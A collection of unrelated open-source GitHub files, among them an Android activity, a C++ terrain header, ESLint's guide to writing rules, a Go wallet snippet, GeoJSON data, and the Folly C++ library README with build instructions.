* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package android.support.v17.leanback.supportleanbackshowcase.app.cards;
import android.app.Activity;
import android.graphics.Color;
import android.graphics.drawable.ColorDrawable;
import android.os.Bundle;
import android.support.v17.leanback.app.GuidedStepFragment;
import android.support.v17.leanback.supportleanbackshowcase.app.dialog.DialogExampleFragment;
import android.support.v17.leanback.supportleanbackshowcase.R;
/**
* TODO: Javadoc
*/
public class CardExampleActivity extends Activity {
@Override public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_cards_example);
}
}
| {
"pile_set_name": "Github"
} |
/*
CDTestFramework http://codercorner.com
Copyright (c) 2007-2008 Pierre Terdiman, [email protected]
This software is provided 'as-is', without any express or implied warranty.
In no event will the authors be held liable for any damages arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it freely,
subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software.
3. This notice may not be removed or altered from any source distribution.
*/
#ifndef TERRAIN_H
#define TERRAIN_H
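// NB: this header is not self-contained; the types udword, Point and Model
// come from the framework headers the project includes elsewhere.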
class TerrainData
{
public:
TerrainData();
~TerrainData();
void init(udword size, float offset, float width, float chaos, bool flat=false, const Point* pos=NULL);
void release();
udword size;
udword nbVerts;
udword nbFaces;
float offset;
float width;
float chaos;
Point* verts;
Point* colors;
Point* normals;
udword* faces;
};
void CreateTerrain();
void ReleaseTerrain();
void RenderTerrain();
void RenderTerrainTriangles(udword nbTriangles, const udword* indices);
const Model* GetTerrainModel();
#endif
| {
"pile_set_name": "Github"
} |
# Working with Rules
Each rule in ESLint has two files named with its identifier (for example, `no-extra-semi`).
* in the `lib/rules` directory: a source file (for example, `no-extra-semi.js`)
* in the `tests/lib/rules` directory: a test file (for example, `no-extra-semi.js`)
**Important:** If you submit a **core** rule to the ESLint repository, you **must** follow some conventions explained below.
Here is the basic format of the source file for a rule:
```js
/**
* @fileoverview Rule to disallow unnecessary semicolons
* @author Nicholas C. Zakas
*/
"use strict";
//------------------------------------------------------------------------------
// Rule Definition
//------------------------------------------------------------------------------
module.exports = function(context) {
return {
// callback functions
};
};
module.exports.schema = []; // no options
```
## Rule Basics
`schema` (array) specifies the [options](#options-schemas) so ESLint can prevent invalid [rule configurations](../user-guide/configuring.md#configuring-rules)
`create` (function) returns an object with methods that ESLint calls to "visit" nodes while traversing the abstract syntax tree (AST as defined by [ESTree](https://github.com/estree/estree)) of JavaScript code:
* if a key is a node type, ESLint calls that **visitor** function while going **down** the tree
* if a key is a node type plus `:exit`, ESLint calls that **visitor** function while going **up** the tree
* if a key is an event name, ESLint calls that **handler** function for [code path analysis](./code-path-analysis.md)
A rule can use the current node and its surrounding tree to report or fix problems.
Here are methods for the [array-callback-return](../rules/array-callback-return.md) rule:
```js
function checkLastSegment (node) {
// report problem for function if last code path segment is reachable
}
module.exports = function(context) {
// declare the state of the rule
return {
ReturnStatement: function(node) {
// at a ReturnStatement node while going down
},
// at a function expression node while going up:
"FunctionExpression:exit": checkLastSegment,
"ArrowFunctionExpression:exit": checkLastSegment,
onCodePathStart: function (codePath, node) {
// at the start of analyzing a code path
},
onCodePathEnd: function(codePath, node) {
// at the end of analyzing a code path
}
};
};
```
## The Context Object
The `context` object contains additional functionality that is helpful for rules to do their jobs. As the name implies, the `context` object contains information that is relevant to the context of the rule. The `context` object has the following properties:
* `parserOptions` - the parser options configured for this run (more details [here](../user-guide/configuring.md#specifying-parser-options)).
* `id` - the rule ID.
* `options` - an array of rule options.
* `settings` - the `settings` from configuration.
* `parserPath` - the full path to the `parser` from configuration.
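For instance, a rule can read shared `settings` so users can configure it from their project configuration (a minimal sketch; the `annotationPrefix` setting name is hypothetical):

```js
module.exports = function(context) {
    // `settings` comes straight from the configuration file,
    // e.g. { "settings": { "annotationPrefix": "@" } }
    var prefix = (context.settings || {}).annotationPrefix || "@";
    // ...
};
```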
Additionally, the `context` object has the following methods:
* `getAncestors()` - returns an array of ancestor nodes based on the current traversal.
* `getDeclaredVariables(node)` - returns the declared variables on the given node.
* `getFilename()` - returns the filename associated with the source.
* `getScope()` - returns the current scope.
* `getSourceCode()` - returns a `SourceCode` object that you can use to work with the source that was passed to ESLint
* `markVariableAsUsed(name)` - marks the named variable in scope as used. This affects the [no-unused-vars](../rules/no-unused-vars.md) rule.
* `report(descriptor)` - reports a problem in the code.
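For instance, a rule that exempts certain names from unused-variable reporting might combine `getScope()` and `markVariableAsUsed()` (a minimal sketch, not a complete rule; the underscore policy is hypothetical):

```js
module.exports = function(context) {
    return {
        "Program:exit": function() {
            // inspect the variables declared in the current (global) scope
            context.getScope().variables.forEach(function(variable) {
                // hypothetical policy: names starting with "_" count as used
                if (variable.name.charAt(0) === "_") {
                    context.markVariableAsUsed(variable.name);
                }
            });
        }
    };
};
```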
**Deprecated:** The following methods on the `context` object are deprecated. Please use the corresponding methods on `SourceCode` instead:
* `getAllComments()` - returns an array of all comments in the source. Use `sourceCode.getAllComments()` instead.
* `getComments(node)` - returns the leading and trailing comments arrays for the given node. Use `sourceCode.getComments(node)` instead.
* `getFirstToken(node)` - returns the first token representing the given node. Use `sourceCode.getFirstToken(node)` instead.
* `getFirstTokens(node, count)` - returns the first `count` tokens representing the given node. Use `sourceCode.getFirstTokens(node, count)` instead.
* `getJSDocComment(node)` - returns the JSDoc comment for a given node or `null` if there is none. Use `sourceCode.getJSDocComment(node)` instead.
* `getLastToken(node)` - returns the last token representing the given node. Use `sourceCode.getLastToken(node)` instead.
* `getLastTokens(node, count)` - returns the last `count` tokens representing the given node. Use `sourceCode.getLastTokens(node, count)` instead.
* `getNodeByRangeIndex(index)` - returns the deepest node in the AST containing the given source index. Use `sourceCode.getNodeByRangeIndex(index)` instead.
* `getSource(node)` - returns the source code for the given node. Omit `node` to get the whole source. Use `sourceCode.getText(node)` instead.
* `getSourceLines()` - returns the entire source code split into an array of string lines. Use `sourceCode.lines` instead.
* `getTokenAfter(nodeOrToken)` - returns the first token after the given node or token. Use `sourceCode.getTokenAfter(nodeOrToken)` instead.
* `getTokenBefore(nodeOrToken)` - returns the first token before the given node or token. Use `sourceCode.getTokenBefore(nodeOrToken)` instead.
* `getTokenByRangeStart(index)` - returns the token whose range starts at the given index in the source. Use `sourceCode.getTokenByRangeStart(index)` instead.
* `getTokens(node)` - returns all tokens for the given node. Use `sourceCode.getTokens(node)` instead.
* `getTokensAfter(nodeOrToken, count)` - returns `count` tokens after the given node or token. Use `sourceCode.getTokensAfter(nodeOrToken, count)` instead.
* `getTokensBefore(nodeOrToken, count)` - returns `count` tokens before the given node or token. Use `sourceCode.getTokensBefore(nodeOrToken, count)` instead.
* `getTokensBetween(node1, node2)` - returns the tokens between two nodes. Use `sourceCode.getTokensBetween(node1, node2)` instead.
* `report(node, [location], message)` - reports a problem in the code.
### context.report()
The main method you'll use is `context.report()`, which publishes a warning or error (depending on the configuration being used). This method accepts a single argument, which is an object containing the following properties:
* `message` - the problem message.
* `node` - (optional) the AST node related to the problem. If present and `loc` is not specified, then the starting location of the node is used as the location of the problem.
* `loc` - (optional) an object specifying the location of the problem. If both `loc` and `node` are specified, then the location is used from `loc` instead of `node`.
* `line` - the 1-based line number at which the problem occurred.
* `column` - the 0-based column number at which the problem occurred.
* `data` - (optional) placeholder data for `message`.
* `fix` - (optional) a function that applies a fix to resolve the problem.
Note that at least one of `node` or `loc` is required.
The simplest example is to use just `node` and `message`:
```js
context.report({
node: node,
message: "Unexpected identifier"
});
```
The node contains all of the information necessary to figure out the line and column number of the offending text as well as the source text representing the node.
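If a rule computes a position itself, it can pass `loc` directly instead of (or in addition to) `node` (a minimal sketch with illustrative coordinates):

```js
context.report({
    node: node,
    loc: {
        line: 1,   // 1-based line number
        column: 4  // 0-based column number
    },
    message: "Unexpected trailing whitespace"
});
```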
You can also use placeholders in the message and provide `data`:
```js
{% raw %}
context.report({
node: node,
message: "Unexpected identifier: {{ identifier }}",
data: {
identifier: node.name
}
});
{% endraw %}
```
Note that leading and trailing whitespace is optional in message parameters.
### Applying Fixes
If you'd like ESLint to attempt to fix the problem you're reporting, you can do so by specifying the `fix` function when using `context.report()`. The `fix` function receives a single argument, a `fixer` object, that you can use to apply a fix. For example:
```js
context.report({
node: node,
message: "Missing semicolon".
fix: function(fixer) {
return fixer.insertTextAfter(node, ";");
}
});
```
Here, the `fix()` function is used to insert a semicolon after the node. Note that the fix is not immediately applied and may not be applied at all if there are conflicts with other fixes. If the fix cannot be applied, then the problem message is reported as usual; if the fix can be applied, then the problem message is not reported.
The `fixer` object has the following methods:
* `insertTextAfter(nodeOrToken, text)` - inserts text after the given node or token
* `insertTextAfterRange(range, text)` - inserts text after the given range
* `insertTextBefore(nodeOrToken, text)` - inserts text before the given node or token
* `insertTextBeforeRange(range, text)` - inserts text before the given range
* `remove(nodeOrToken)` - removes the given node or token
* `removeRange(range)` - removes text in the given range
* `replaceText(nodeOrToken, text)` - replaces the text in the given node or token
* `replaceTextRange(range, text)` - replaces the text in the given range
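For instance, a quote-style rule might replace a literal's text in a single operation (a hedged sketch; a real fix would also have to re-escape embedded quotes):

```js
context.report({
    node: node,
    message: "Strings must use doublequote.",
    fix: function(fixer) {
        // naive conversion of a single-quoted string literal
        return fixer.replaceText(node, "\"" + node.value + "\"");
    }
});
```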
Best practices for fixes:
1. Make fixes that are as small as possible. Anything more than a single character is risky and could prevent other, simpler fixes from being made.
1. Only make one fix per message. This is enforced because you must return the result of the fixer operation from `fix()`.
1. Fixes should not introduce clashes with other rules. You can accidentally introduce a new problem that won't be reported until ESLint is run again. This is another good reason to keep each fix as small as possible.
### context.options
Some rules require options in order to function correctly. These options appear in configuration (`.eslintrc`, command line, or in comments). For example:
```json
{
"quotes": [2, "double"]
}
```
The `quotes` rule in this example has one option, `"double"` (the `2` is the error level). You can retrieve the options for a rule by using `context.options`, which is an array containing every configured option for the rule. In this case, `context.options[0]` would contain `"double"`:
```js
module.exports = function(context) {
var isDouble = (context.options[0] === "double");
// ...
}
```
Since `context.options` is just an array, you can use it to determine how many options have been passed as well as retrieving the actual options themselves. Keep in mind that the error level is not part of `context.options`, as the error level cannot be known or modified from inside a rule.
When using options, make sure that your rule has some logical defaults in case the options are not provided.
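For example (a minimal sketch):

```js
module.exports = function(context) {
    // fall back to "double" when no option is configured
    var quoteOption = context.options[0] || "double";
    // ...
};
```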
### context.getSourceCode()
The `SourceCode` object is the main object for getting more information about the source code being linted. You can retrieve the `SourceCode` object at any time by using the `getSourceCode()` method:
```js
module.exports = function(context) {
var sourceCode = context.getSourceCode();
// ...
}
```
Once you have an instance of `SourceCode`, you can use the methods on it to work with the code:
* `getAllComments()` - returns an array of all comments in the source.
* `getComments(node)` - returns the leading and trailing comments arrays for the given node.
* `getFirstToken(node)` - returns the first token representing the given node.
* `getFirstTokens(node, count)` - returns the first `count` tokens representing the given node.
* `getJSDocComment(node)` - returns the JSDoc comment for a given node or `null` if there is none.
* `getLastToken(node)` - returns the last token representing the given node.
* `getLastTokens(node, count)` - returns the last `count` tokens representing the given node.
* `getNodeByRangeIndex(index)` - returns the deepest node in the AST containing the given source index.
* `isSpaceBetweenTokens(first, second)` - returns true if there is a whitespace character between the two tokens.
* `getText(node)` - returns the source code for the given node. Omit `node` to get the whole source.
* `getTokenAfter(nodeOrToken)` - returns the first token after the given node or token.
* `getTokenBefore(nodeOrToken)` - returns the first token before the given node or token.
* `getTokenByRangeStart(index)` - returns the token whose range starts at the given index in the source.
* `getTokens(node)` - returns all tokens for the given node.
* `getTokensAfter(nodeOrToken, count)` - returns `count` tokens after the given node or token.
* `getTokensBefore(nodeOrToken, count)` - returns `count` tokens before the given node or token.
* `getTokensBetween(node1, node2)` - returns the tokens between two nodes.
There are also some properties you can access:
* `hasBOM` - the flag to indicate whether or not the source code has Unicode BOM.
* `text` - the full text of the code being linted. Unicode BOM has been stripped from this text.
* `ast` - the `Program` node of the AST for the code being linted.
* `lines` - an array of lines, split according to the specification's definition of line breaks.
You should use a `SourceCode` object whenever you need to get more information about the code being linted.
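For instance, a spacing rule might inspect the tokens around a node using only the methods above (a minimal sketch; `node` is assumed to come from a visitor function):

```js
var sourceCode = context.getSourceCode();
var firstToken = sourceCode.getFirstToken(node);
var tokenBefore = sourceCode.getTokenBefore(node);

// report when no whitespace separates the node from the preceding token
if (!sourceCode.isSpaceBetweenTokens(tokenBefore, firstToken)) {
    context.report({
        node: node,
        message: "Expected whitespace before this node."
    });
}
```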
### Options Schemas
Rules may export a `schema` property, which is a [JSON schema](http://json-schema.org/) format description of a rule's options which will be used by ESLint to validate configuration options and prevent invalid or unexpected inputs before they are passed to the rule in `context.options`.
There are two formats for a rule's exported `schema`. The first is a full JSON Schema object describing all possible options the rule accepts, including the rule's error level as the first argument and any optional arguments thereafter.
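For example, the full-object form for a rule with one optional string argument might look like this (a hypothetical sketch; note that the object must account for the error level as well):

```js
module.exports.schema = {
    "type": "array",
    "items": [
        { "enum": [0, 1, 2] },          // the error level
        { "enum": ["always", "never"] } // the rule's own option
    ],
    "minItems": 1,
    "maxItems": 2
};
```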
However, to simplify schema creation, rules may also export an array of schemas for each optional positional argument, and ESLint will automatically validate the required error level first. For example, the `yoda` rule accepts a primary mode argument, as well as an extra options object with named properties.
```js
// "yoda": [2, "never", { "exceptRange": true }]
module.exports.schema = [
{
"enum": ["always", "never"]
},
{
"type": "object",
"properties": {
"exceptRange": {
"type": "boolean"
}
},
"additionalProperties": false
}
];
```
In the preceding example, the error level is assumed to be the first argument. It is followed by the first optional argument, a string which may be either `"always"` or `"never"`. The final optional argument is an object, which may have a Boolean property named `exceptRange`.
To learn more about JSON Schema, we recommend looking at some [examples](http://json-schema.org/examples.html) to start, and also reading [Understanding JSON Schema](http://spacetelescope.github.io/understanding-json-schema/) (a free ebook).
### Getting the Source
If your rule needs to get the actual JavaScript source to work with, then use the `sourceCode.getText()` method. This method works as follows:
```js
// get all source
var source = sourceCode.getText();
// get source for just this AST node
var nodeSource = sourceCode.getText(node);
// get source for AST node plus previous two characters
var nodeSourceWithPrev = sourceCode.getText(node, 2);
// get source for AST node plus following two characters
var nodeSourceWithFollowing = sourceCode.getText(node, 0, 2);
```
In this way, you can look for patterns in the JavaScript text itself when the AST isn't providing the appropriate data (such as location of commas, semicolons, parentheses, etc.).
### Accessing comments
If you need to access comments for a specific node you can use `sourceCode.getComments(node)`:
```js
// the "comments" variable has a "leading" and "trailing" property containing
// its leading and trailing comments, respectively
var comments = sourceCode.getComments(node);
```
Keep in mind that comments are technically not a part of the AST and are only attached to it on demand, i.e. when you call `getComments()`.
**Note:** One of the libraries adds AST node properties for comments - do not use these properties. Always use `sourceCode.getComments()` as this is the only guaranteed API for accessing comments (we will likely change how comments are handled later).
### Accessing Code Paths
ESLint analyzes code paths while traversing the AST.
You can access the resulting code path objects through five events related to code paths.
See [code path analysis](./code-path-analysis.md) for details.
## Rule Unit Tests
Each rule must have a set of unit tests submitted with it to be accepted. The test file is named the same as the source file but lives in `tests/lib/`. For example, if your rule source file is `lib/rules/foo.js` then your test file should be `tests/lib/rules/foo.js`.
For your rule, be sure to test:
1. All instances that should be flagged as warnings.
1. At least one pattern that should **not** be flagged as a warning.
The basic pattern for a rule unit test file is:
```js
/**
* @fileoverview Tests for no-with rule.
* @author Nicholas C. Zakas
*/
"use strict";
//------------------------------------------------------------------------------
// Requirements
//------------------------------------------------------------------------------
var rule = require("../../../lib/rules/no-with"),
RuleTester = require("../../../lib/testers/rule-tester");
//------------------------------------------------------------------------------
// Tests
//------------------------------------------------------------------------------
var ruleTester = new RuleTester();
ruleTester.run("no-with", rule, {
valid: [
"foo.bar()"
],
invalid: [
{
code: "with(foo) { bar() }",
errors: [{ message: "Unexpected use of 'with' statement.", type: "WithStatement"}]
}
]
});
```
Be sure to replace the value of `"no-with"` with your rule's ID. There are plenty of examples in the `tests/lib/rules/` directory.
### Valid Code
Each valid case can be either a string or an object. The object form is used when you need to specify additional global variables or arguments for the rule. For example, the following defines `window` as a global variable for code that should not trigger the rule being tested:
```js
valid: [
{
code: "window.alert()",
globals: [ "window" ]
}
]
```
You can also pass options to the rule (if it accepts them). These arguments are equivalent to how people can configure rules in their `.eslintrc` file. For example:
```js
valid: [
{
code: "var msg = 'Hello';",
options: [ "single" ]
}
]
```
The `options` property must be an array of options. This gets passed through to `context.options` in the rule.
### Invalid Code
Each invalid case must be an object containing the code to test and at least one message that is produced by the rule. The `errors` key specifies an array of objects, each containing a message (your rule may trigger multiple messages for the same code). You should also specify the type of AST node you expect to receive back using the `type` key. The AST node should represent the actual spot in the code where there is a problem. For example:
```js
invalid: [
{
code: "function doSomething() { var f; if (true) { var build = true; } f = build; }",
errors: [
{ message: "build used outside of binding context.", type: "Identifier" }
]
}
]
```
In this case, the message is specific to the variable being used and the AST node type is `Identifier`.
Similar to the valid cases, you can also specify `options` to be passed to the rule:
```js
invalid: [
{
code: "function doSomething() { var f; if (true) { var build = true; } f = build; }",
options: [ "double" ],
errors: [
{ message: "build used outside of binding context.", type: "Identifier" }
]
}
]
```
For simpler cases where the only thing that really matters is the error message, you can also specify any `errors` as strings. You can also have some strings and some objects, if you like.
```js
invalid: [
{
code: "'single quotes'",
options: ["double"],
errors: ["Strings must use doublequote."]
}
]
```
### Specifying Parser Options
Some tests require that a certain parser configuration be used. This can be specified in test specifications via the `parserOptions` setting.
For example, to set `ecmaVersion` to 6 (in order to use constructs like `for ... of`):
```js
valid: [
{
code: "for (x of a) doSomething();",
parserOptions: { ecmaVersion: 6 }
}
]
```
If you are working with ES6 modules:
```js
valid: [
{
code: "export default function () {};",
parserOptions: { ecmaVersion: 6, sourceType: "module" }
}
]
```
For non-version specific features such as JSX:
```js
valid: [
{
code: "var foo = <div>{bar}</div>",
parserOptions: { ecmaFeatures: { jsx: true } }
}
]
```
The options available and the expected syntax for `parserOptions` is the same as those used in [configuration](../user-guide/configuring.md#specifying-parser-options).
### Write Several Tests
Provide as many unit tests as possible. Your pull request will never be turned down for having too many tests submitted with it!
## Performance Testing
To keep the linting process efficient and unobtrusive, it is useful to verify the performance impact of new rules or modifications to existing rules.
### Overall Performance
The `npm run perf` command gives a high-level overview of ESLint running time with default rules (`eslint:recommended`) enabled.
```bash
$ git checkout master
Switched to branch 'master'
$ npm run perf
CPU Speed is 2200 with multiplier 7500000
Performance Run #1: 1394.689313ms
Performance Run #2: 1423.295351ms
Performance Run #3: 1385.09515ms
Performance Run #4: 1382.406982ms
Performance Run #5: 1409.68566ms
Performance budget ok: 1394.689313ms (limit: 3409.090909090909ms)
$ git checkout my-rule-branch
Switched to branch 'my-rule-branch'
$ npm run perf
CPU Speed is 2200 with multiplier 7500000
Performance Run #1: 1443.736547ms
Performance Run #2: 1419.193291ms
Performance Run #3: 1436.018228ms
Performance Run #4: 1473.605485ms
Performance Run #5: 1457.455283ms
Performance budget ok: 1443.736547ms (limit: 3409.090909090909ms)
```
### Per-rule Performance
ESLint has a built-in method to track performance of individual rules. Setting the `TIMING` environment variable will trigger the display, upon linting completion, of the ten longest-running rules, along with their individual running time and relative performance impact as a percentage of total rule processing time.
```bash
$ TIMING=1 eslint lib
Rule | Time (ms) | Relative
:-----------------------|----------:|--------:
no-multi-spaces | 52.472 | 6.1%
camelcase | 48.684 | 5.7%
no-irregular-whitespace | 43.847 | 5.1%
valid-jsdoc | 40.346 | 4.7%
handle-callback-err | 39.153 | 4.6%
space-infix-ops | 35.444 | 4.1%
no-undefined | 25.693 | 3.0%
no-shadow | 22.759 | 2.7%
no-empty-class | 21.976 | 2.6%
semi | 19.359 | 2.3%
```
To test one rule explicitly, combine the `--no-eslintrc` and `--rule` options:
```bash
$ TIMING=1 eslint --no-eslintrc --rule "quotes: [2, 'double']" lib
Rule | Time (ms) | Relative
:------|----------:|--------:
quotes | 18.066 | 100.0%
```
## Rule Naming Conventions
The rule naming conventions for ESLint are fairly simple:
* If your rule is disallowing something, prefix it with `no-` such as `no-eval` for disallowing `eval()` and `no-debugger` for disallowing `debugger`.
* If your rule is enforcing the inclusion of something, use a short name without a special prefix.
* Keep your rule names as short as possible, use abbreviations where appropriate, and no more than four words.
* Use dashes between words.
## Rule Acceptance Criteria
Because rules are highly personal (and therefore very contentious), accepted rules should:
* Not be library-specific.
* Demonstrate a possible issue that can be resolved by rewriting the code.
* Be general enough to apply to a large number of developers.
* Not be the opposite of an existing rule.
* Not overlap with an existing rule.
## Runtime Rules
The thing that makes ESLint different from other linters is the ability to define custom rules at runtime. This is perfect for rules that are specific to your project or company and wouldn't make sense for ESLint to ship with. With runtime rules, you don't have to wait for the next version of ESLint or be disappointed that your rule isn't general enough to apply to the larger JavaScript community, just write your rules and include them at runtime.
Runtime rules are written in the same format as all other rules. Create your rule as you would any other and then follow these steps:
1. Place all of your runtime rules in the same directory (e.g., `eslint_rules`).
2. Create a [configuration file](../user-guide/configuring.md) and specify your rule ID error level under the `rules` key. Your rule will not run unless it has a value of `1` or `2` in the configuration file.
3. Run the [command line interface](../user-guide/command-line-interface.md) using the `--rulesdir` option to specify the location of your runtime rules.
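For example, assuming your rules live in a directory named `eslint_rules` (an illustrative path), the invocation might look like this:

```bash
eslint --rulesdir eslint_rules src/
```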
| {
"pile_set_name": "Github"
} |
## Projects Using Tether
Here at HubSpot we have built a bunch of libraries on top of Tether,
both because we wanted Tether-performance, and because we saw opportunities
to improve on what was available in the client-side ecosystem.
### [Select](http://github.hubspot.com/select/docs/welcome)
Select is a replacement for native browser select elements that is fully stylable.
### [Shepherd](http://github.hubspot.com/shepherd/docs/welcome)
Shepherd is a library for making tours of your app to help onboard users and show off
new features.
### [Tooltip](http://github.hubspot.com/tooltip/docs/welcome)
A simple, easy-to-use implementation of tooltips that works well.
### [Drop](http://github.hubspot.com/drop/docs/welcome)
Where Tether does general-purpose positioning, Drop assumes that you are interested
in making something which pops up next to something the user clicks or hovers on.
If you're building something that fits that pattern, Drop can make things a little easier.
### [Blueprint](http://blueprintjs.com/)
A React UI toolkit for the web.
### [Bootstrap 4](http://getbootstrap.com/)
Tooltips and popovers in Bootstrap 4 are positioned using Tether.
### [Ember Tether](https://github.com/yapplabs/ember-tether)
An Ember.js-friendly interface for Tether.
### [React Datepicker](https://github.com/Hacker0x01/react-datepicker)
A simple and reusable datepicker component for React.
### Your Project Here
If you have a cool open-source library built on Tether, PR this doc.
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/xhtml; charset=UTF-8" />
<title>Check #238.3 - Negative</title>
<link rel="stylesheet" href="../../../libs/qunit/qunit.css" media="screen">
</head>
<body>
<form action="http://mysite.com">
<p><input type="image" name="submit" src="renew.gif" alt="renew license" /></p>
</form>
<script id="qunit-jquery" src="../../../libs/jquery/jquery.js"></script>
<script id="qunit-events" src="../../../libs/jquery.hasEventListener/jquery.hasEventListener-2.0.3.js"></script>
<script id="qunit-quail" src="../../../src/quail.js"></script>
<script id="qunit-composite" src="../../composite.js"></script>
<script id="qunit-qunit" src="../../../libs/qunit/qunit.js"></script>
<script></script>
</body>
</html> | {
"pile_set_name": "Github"
} |
package BLC
import "fmt"
func (cli *CLI) createWallet(nodeID string) {
	// NewWallets also returns an error, which is discarded here
	wallets, _ := NewWallets(nodeID)
	wallets.CreateNewWallet(nodeID)
	fmt.Println(len(wallets.WalletsMap))
}
| {
"pile_set_name": "Github"
} |
{
"type": "FeatureCollection",
"features": [{
"type": "Feature",
"properties": {},
"geometry": {
"type": "Polygon",
"coordinates": [
[[34, 119],
[20, 20],
[132, 141],
[34, 119]]
]
}
},{
"type": "Feature",
"properties": {},
"geometry": {
"type": "Polygon",
"coordinates": [
[[27.681744389656238, 74.32090675542626],
[25.1362898442017, 56.3209067554263],
[35.67034343592924, 56.32090675542627],
[35.67034343592924, 74.32090675542624],
[27.681744389656238, 74.32090675542626]]
]
}
}]
}
| {
"pile_set_name": "Github"
} |
// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.content.browser.input;
import org.chromium.ui.DropdownItem;
/**
* Select popup item containing the label, the type and the enabled state
* of an item belonging to a select popup dialog.
*/
public class SelectPopupItem implements DropdownItem {
private final String mLabel;
private final int mType;
public SelectPopupItem(String label, int type) {
mLabel = label;
mType = type;
}
@Override
public String getLabel() {
return mLabel;
}
@Override
public String getSublabel() {
return null;
}
@Override
public int getIconId() {
return NO_ICON;
}
@Override
public boolean isEnabled() {
return mType == PopupItemType.ENABLED || mType == PopupItemType.GROUP;
}
@Override
public boolean isGroupHeader() {
return mType == PopupItemType.GROUP;
}
@Override
public boolean isMultilineLabel() {
return false;
}
public int getType() {
return mType;
}
}
| {
"pile_set_name": "Github"
} |
Folly: Facebook Open-source Library
-----------------------------------
[](https://travis-ci.org/facebook/folly)
### What is `folly`?
Folly (acronymed loosely after Facebook Open Source Library) is a
library of C++14 components designed with practicality and efficiency
in mind. **Folly contains a variety of core library components used extensively
at Facebook**. In particular, it's often a dependency of Facebook's other
open source C++ efforts and place where those projects can share code.
It complements (as opposed to competing against) offerings
such as Boost and of course `std`. In fact, we embark on defining our
own component only when something we need is either not available, or
does not meet the needed performance profile. We endeavor to remove
things from folly if or when `std` or Boost obsoletes them.
Performance concerns permeate much of Folly, sometimes leading to
designs that are more idiosyncratic than they would otherwise be (see
e.g. `PackedSyncPtr.h`, `SmallLocks.h`). Good performance at large
scale is a unifying theme in all of Folly.
### Logical Design
Folly is a collection of relatively independent components, some as
simple as a few symbols. There is no restriction on internal
dependencies, meaning that a given folly module may use any other
folly components.
All symbols are defined in the top-level namespace `folly`, except of
course macros. Macro names are ALL_UPPERCASE and should be prefixed
with `FOLLY_`. Namespace `folly` defines other internal namespaces
such as `internal` or `detail`. User code should not depend on symbols
in those namespaces.
Folly has an `experimental` directory as well. This designation connotes
primarily that we feel the API may change heavily over time. This code,
typically, is still in heavy use and is well tested.
### Physical Design
At the top level Folly uses the classic "stuttering" scheme
`folly/folly` used by Boost and others. The first directory serves as
an installation root of the library (with possible versioning a la
`folly-1.0/`), and the second is to distinguish the library when
including files, e.g. `#include <folly/FBString.h>`.
The directory structure is flat (mimicking the namespace structure),
i.e. we don't have an elaborate directory hierarchy (it is possible
this will change in future versions). The subdirectory `experimental`
contains files that are used inside folly and possibly at Facebook but
not considered stable enough for client use. Your code should not use
files in `folly/experimental` lest it may break when you update Folly.
The `folly/folly/test` subdirectory includes the unittests for all
components, usually named `ComponentXyzTest.cpp` for each
`ComponentXyz.*`. The `folly/folly/docs` directory contains
documentation.
### What's in it?
Because of folly's fairly flat structure, the best way to see what's in it
is to look at the headers in [top level `folly/` directory](https://github.com/facebook/folly/tree/master/folly). You can also
check the [`docs` folder](folly/docs) for documentation, starting with the
[overview](folly/docs/Overview.md).
Folly is published on Github at https://github.com/facebook/folly
### Build Notes
#### Dependencies
folly requires gcc 4.9+ and a version of boost compiled with C++14 support.
googletest is required to build and run folly's tests. You can download
it from https://github.com/google/googletest/archive/release-1.8.0.tar.gz
The following commands can be used to download and install it:
```
wget https://github.com/google/googletest/archive/release-1.8.0.tar.gz && \
tar zxf release-1.8.0.tar.gz && \
rm -f release-1.8.0.tar.gz && \
cd googletest-release-1.8.0 && \
cmake . && \
make && \
make install
```
#### Finding dependencies in non-default locations
If you have boost, gtest, or other dependencies installed in a non-default
location, you can use the `CMAKE_INCLUDE_PATH` and `CMAKE_LIBRARY_PATH`
variables to make CMake also look for header files and libraries in
non-standard locations. For example, to also search the directories
`/alt/include/path1` and `/alt/include/path2` for header files and the
directories `/alt/lib/path1` and `/alt/lib/path2` for libraries, you can invoke
`cmake` as follows:
```
cmake \
-DCMAKE_INCLUDE_PATH=/alt/include/path1:/alt/include/path2 \
-DCMAKE_LIBRARY_PATH=/alt/lib/path1:/alt/lib/path2 ...
```
#### Ubuntu 16.04 LTS
The following packages are required (feel free to cut and paste the apt-get
command below):
```
sudo apt-get install \
g++ \
cmake \
libboost-all-dev \
libevent-dev \
libdouble-conversion-dev \
libgoogle-glog-dev \
libgflags-dev \
libiberty-dev \
liblz4-dev \
liblzma-dev \
libsnappy-dev \
make \
zlib1g-dev \
binutils-dev \
libjemalloc-dev \
libssl-dev \
pkg-config
```
If advanced debugging functionality is required, use:
```
sudo apt-get install \
libunwind8-dev \
libelf-dev \
libdwarf-dev
```
In the folly directory, run:
```
mkdir _build && cd _build
cmake ..
make -j $(nproc)
make install
```
#### OS X (Homebrew)
folly is available as a Formula and releases may be built via `brew install folly`.
You may also use `folly/build/bootstrap-osx-homebrew.sh` to build against `master`:
```
cd folly
./build/bootstrap-osx-homebrew.sh
```
#### OS X (MacPorts)
Install the required packages from MacPorts:
```
sudo port install \
autoconf \
automake \
boost \
gflags \
git \
google-glog \
libevent \
libtool \
lz4 \
lzma \
scons \
snappy \
zlib
```
Download and install double-conversion:
```
git clone https://github.com/google/double-conversion.git
cd double-conversion
cmake -DBUILD_SHARED_LIBS=ON .
make
sudo make install
```
Download and install folly with the parameters listed below:
```
